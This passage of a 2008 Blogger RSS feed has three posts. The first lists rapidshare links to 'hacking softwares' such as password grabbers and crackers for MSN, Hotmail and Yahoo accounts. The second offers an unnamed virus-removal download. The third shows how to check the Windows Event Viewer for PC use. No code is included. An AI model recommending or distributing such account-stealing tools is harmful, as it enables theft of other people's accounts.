/&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/84112082/AIO_Trace_Ip_toolz.rar"&gt;rapidshare.com/files/84112082/AIO_Trace_Ip_toolz.rar&lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91730792/Seria-of-Soft.rar"&gt;rapidshare.com/files/91730792/Seria-of-S&lt;/a&gt;&lt;wbr&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91730792/Seria-of-Soft.rar"&gt;oft.rar&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91730792/Seria-of-Soft.rar"&gt;rapidshare.com/files/91624959/hide_ip_pl&lt;/a&gt;&lt;wbr&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91730792/Seria-of-Soft.rar"&gt;antinumwith_key.rar&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.blogger.com/post-edit.g?blogID=3865216611793770662&amp;amp;postID=8723692169863781576#%20rapidshare.com/files/91023193/Account-Locker.rar"&gt;rapidshare.com/files/91023193/Account-Lo&lt;/a&gt;&lt;wbr&gt;&lt;a href="http://www.blogger.com/post-edit.g?blogID=3865216611793770662&amp;amp;postID=8723692169863781576#%20rapidshare.com/files/91023193/Account-Locker.rar"&gt;cker.rar&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91023633/Anti-Mail-Bomb.rar"&gt;rapidshare.com/files/91023633/Anti-Mail-&lt;/a&gt;&lt;wbr&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91023633/Anti-Mail-Bomb.rar"&gt;Bomb.rar&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91024117/Emoticon_Creator.rar"&gt;rapidshare.com/files/91024117/Emoticon_C&lt;/a&gt;&lt;wbr&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91024117/Emoticon_Creator.rar"&gt;reator.rar&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91025261/Frez-Accont.rar"&gt;rapidshare.com/files/91025261/Frez-Accon&lt;/a&gt;&lt;wbr&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91025261/Frez-Accont.rar"&gt;t.rar&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91027689/Kitle.rar"&gt;rapidshare.com/files/91027689/Kitle.rar&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91029795/Msn-Block-Checker.rar"&gt;rapidshare.com/files/91029795/Msn-Block-&lt;/a&gt;&lt;wbr&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91029795/Msn-Block-Checker.rar"&gt;Checker.rar&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91032421/Proyect_Lithium_Version_0.2.0.rar"&gt;rapidshare.com/files/91032421/Proyect_Li&lt;/a&gt;&lt;wbr&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91032421/Proyect_Lithium_Version_0.2.0.rar"&gt;thium_Version_0.2.0.rar&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.blogger.com/post-edit.g?blogID=3865216611793770662&amp;amp;postID=8723692169863781576#%20rapidshare.com/files/91033497/skinnerv12setup.rar"&gt;rapidshare.com/files/91033497/skinnerv12&lt;/a&gt;&lt;wbr&gt;&lt;a href="http://www.blogger.com/post-edit.g?blogID=3865216611793770662&amp;amp;postID=8723692169863781576#%20rapidshare.com/files/91033497/skinnerv12setup.rar"&gt;setup.rar&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91025674/Hot-Hack.rar"&gt;rapidshare.com/files/91025674/Hot-Hack.r&lt;/a&gt;&lt;wbr&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91025674/Hot-Hack.rar"&gt;ar&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.blogger.com/post-edit.g?blogID=3865216611793770662&amp;amp;postID=8723692169863781576#%20rapidshare.com/files/91026666/Hotmal-Kiler.rar"&gt;rapidshare.com/files/91026666/Hotmal-Kil&lt;/a&gt;&lt;wbr&gt;&lt;a href="http://www.blogger.com/post-edit.g?blogID=3865216611793770662&amp;amp;postID=8723692169863781576#%20rapidshare.com/files/91026666/Hotmal-Kiler.rar"&gt;er.rar&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91027055/Hotm-Crak.rar"&gt;rapidshare.com/files/91027055/Hotm-Crak.&lt;/a&gt;&lt;wbr&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91027055/Hotm-Crak.rar"&gt;rar&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91028264/MSN7UniversalPatcherPlusPlus.rar"&gt;rapidshare.com/files/91028264/MSN7Univer&lt;/a&gt;&lt;wbr&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91028264/MSN7UniversalPatcherPlusPlus.rar"&gt;salPatcherPlusPlus.rar&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91028827/Msn-_Dondurucu-hhhh.rar"&gt;rapidshare.com/files/91028827/Msn-_Dondu&lt;/a&gt;&lt;wbr&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91028827/Msn-_Dondurucu-hhhh.rar"&gt;rucu-hhhh.rar&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91029357/Msn-Auto-Responder.rar"&gt;rapidshare.com/files/91029357/Msn-Auto-R&lt;/a&gt;&lt;wbr&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91029357/Msn-Auto-Responder.rar"&gt;esponder.rar&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91030167/Msn-Clean.rar"&gt;rapidshare.com/files/91030167/Msn-Clean.&lt;/a&gt;&lt;wbr&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91030167/Msn-Clean.rar"&gt;rar&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91030644/Msn-Pass-Grab.rar"&gt;rapidshare.com/files/91030644/Msn-Pass-G&lt;/a&gt;&lt;wbr&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91030644/Msn-Pass-Grab.rar"&gt;rab.rar&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91031205/Msn-Pass-Recouvery.rar"&gt;rapidshare.com/files/91031205/Msn-Pass-R&lt;/a&gt;&lt;wbr&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91031205/Msn-Pass-Recouvery.rar"&gt;ecouvery.rar&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91031509/My-Pass.rar"&gt;rapidshare.com/files/91031509/My-Pass.ra&lt;/a&gt;&lt;wbr&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91031509/My-Pass.rar"&gt;r&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91035275/t__T__T8f_OnT2.rar"&gt;rapidshare.com/files/91035275/t__T__T8f_&lt;/a&gt;&lt;wbr&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91035275/t__T__T8f_OnT2.rar"&gt;OnT2.rar&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91035276/Yah-Boter.rar"&gt;rapidshare.com/files/91035276/Yaho-Boter.&lt;/a&gt;&lt;wbr&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91035276/Yah-Boter.rar"&gt;rar&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91035277/yahoocrack.rar"&gt;rapidshare.com/files/91035277/yahoocrack&lt;/a&gt;&lt;wbr&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91035277/yahoocrack.rar"&gt;.rar&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91035278/Yaho-Web-Hak.rar"&gt;rapidshare.com/files/91035278/Yaho-Web-H&lt;/a&gt;&lt;wbr&gt;&lt;a href="http://www.blogger.com/rapidshare.com/files/91035278/Yaho-Web-Hak.rar"&gt;ak.rar&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;img src="http://img179.imageshack.us/img179/4504/nsaiengu8.png" border="0" /&gt;</description><link>http://freedownloaz.blogspot.com/2008/02/free-hacking-softwares.html</link><author>noreply@blogger.com (saien)</author><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3865216611793770662.post-6081865708359595953</guid><pubDate>Thu, 14 Feb 2008 14:47:00 +0000</pubDate><atom:updated>2008-02-18T04:39:39.293-08:00</atom:updated><title>How to remove "Orkut is banned" Virus</title><description>&lt;h2 style="color: rgb(0, 0, 0); text-align: justify; font-weight: normal;" class="r"&gt;&lt;span style="font-size:78%;"&gt;How to remove "Orkut is banned" Virus or how to disable dat virus from ur computer. I think u have seen a trick to remove dat&lt;span&gt; &lt;/span&gt;&lt;span&gt;w32.USB&lt;/span&gt;&lt;span&gt;  &lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:78%;"&gt;&lt;span&gt;worm&lt;/span&gt;, &lt;/span&gt;&lt;span style="font-size:78%;"&gt;from ur computer many of them as said u to goto task Manger &amp;amp; then goto processor delete a particular file from it , its a long procudure to do it &amp;amp; i think many of us didn't understand.&lt;/span&gt;&lt;/h2&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-size:100%;"&gt;Here i ll give u a software which automatically removes dat virus from ur computer and heals registry &amp;amp; it enables "show hidden files option" &amp;amp; also makes the pc immune to the viruses, if u double click the virus next time it wont affect the system.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;a href="javascript:startDownload()"&gt;Download here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://img179.imageshack.us/img179/4504/nsaiengu8.png" border="0" /&gt;&lt;br /&gt;&lt;a href="javascript:startDownload()"&gt; &lt;/a&gt;&lt;/span&gt;&lt;/div&gt;</description><link>http://freedownloaz.blogspot.com/2008/02/how-to-remove-orkut-is-banned-virus_5314.html</link><author>noreply@blogger.com (saien)</author><thr:total>2</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3865216611793770662.post-1701607337438806592</guid><pubDate>Thu, 14 Feb 2008 14:03:00 +0000</pubDate><atom:updated>2008-02-18T04:40:00.576-08:00</atom:updated><title>Who Used Your Pc In Your Absence,what Did He Do?</title><description>&lt;h3 style="font-weight: normal;" class="smller"&gt;&lt;span style="font-size:100%;"&gt;Track my computer!&lt;/span&gt;&lt;br /&gt;&lt;/h3&gt;&lt;h3 style="font-weight: normal;" class="smller"&gt;&lt;span style="font-size:100%;"&gt;Who Used my computer, In my absense,what did he do?Here is a small trick which shows who operated  your pc what did he do &amp;amp; watch he hs watching how much long he has been using ur pc...&lt;br /&gt;&lt;/span&gt;&lt;/h3&gt; &lt;div style="color: rgb(0, 0, 0);" class="para"&gt; First you should goto :&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;start-- &gt; run-- &gt; eventvwr.msc&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Events are stored in three log files: &lt;span style="font-weight: bold;"&gt;Application, Security, and System&lt;/span&gt;. These logs can be reviewed and archived.&lt;br /&gt;For our purposes we want the System log. Click on &lt;span style="font-weight: bold;"&gt;"System"&lt;/span&gt; in the left-hand column for a list of events.&lt;br /&gt;Look for a date and time when you weren't home and your computer should have been off.&lt;br /&gt;&lt;br /&gt;Double click on the eg: info and  it will show u the detail.&lt;br /&gt;&lt;br /&gt;You can also use this log to see how long someone was on the computer. Just look at the time the computer was turned on and off for that day.&lt;br /&gt;&lt;br /&gt;Hope u all will like it.&lt;br /&gt;&lt;br /&gt;&lt;img src="http://img179.imageshack.us/img179/4504/nsaiengu8.png" border="0" /&gt;&lt;br /&gt;&lt;/div&gt;</description><link>http://freedownloaz.blogspot.com/2008/02/who-used-your-pc-in-your-absencewhat.html</link><author>noreply@blogger.com (saien)</author><thr:total>3</thr:total></item></channel></rss>